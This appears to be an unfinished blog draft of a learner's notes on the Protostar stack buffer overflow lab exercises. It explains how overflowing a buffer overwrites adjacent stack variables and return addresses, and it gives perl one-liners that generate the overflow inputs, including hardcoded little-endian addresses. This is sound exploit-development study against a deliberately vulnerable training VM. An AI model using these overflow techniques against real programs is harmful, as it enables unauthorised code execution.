(DRAFTS I SHOULD'VE POSTED BUT DIDN'T)
====================================================================
EXERCISE 0
Goal : Modify the 'modified' variable.
====================================================================
First off, include the directory for protostar executables in your shell PATH.
In the code, notice that modified is declared (and therefore stored) before buffer. The stack grows down but writes up, meaning modified has a higher address than buffer because it came first. Writing up from the base of buffer, we can provide too much input and change modified.
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 1
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Note the important hint that "Protostar is little endian." When you don't take that into account, it fails.
=====IMPLEMENTATION=====:
====================================================================
EXERCISE 2
Goal : Modify the 'modified' variable to a specific value (ABCD)
====================================================================
Perl script
=====IMPLEMENTATION=====:
====================================================================
If you put the line:
set disassembly-flavor intel
in the file ~/.gdbinit it should work.
enable ssh server
READ THIS: http://insecure.org/stf/smashstack.html
[I SHOULD REALLY CLEAN THIS UP... EVENTUALLY....]
#0
perl -e 'print "A"x65' >attack0.sh
#1
perl -e 'print "A"x64, "dcba"'>attack1.sh
#2
set environment var with perl
get newline into buffer overflow ==> just use ' . '
#3
[picture from 4:20ish here 7/24]
perl -e 'print "a"x64 . "\x24\x84\x04\x08"' > attack3.txt
./stack3 < attack3.txt
#4
perl -e 'print "A"x76 . "\xf4\x83\x04\x08"'>attack4.txt
#5
[pic @ 5:35 7/24 here]
ON PROTOSTAR:
ip addr (get ip address )
TERMINAL ON OSX
ssh user@IPADDRESSHERE
user
bash
No comments:
Post a Comment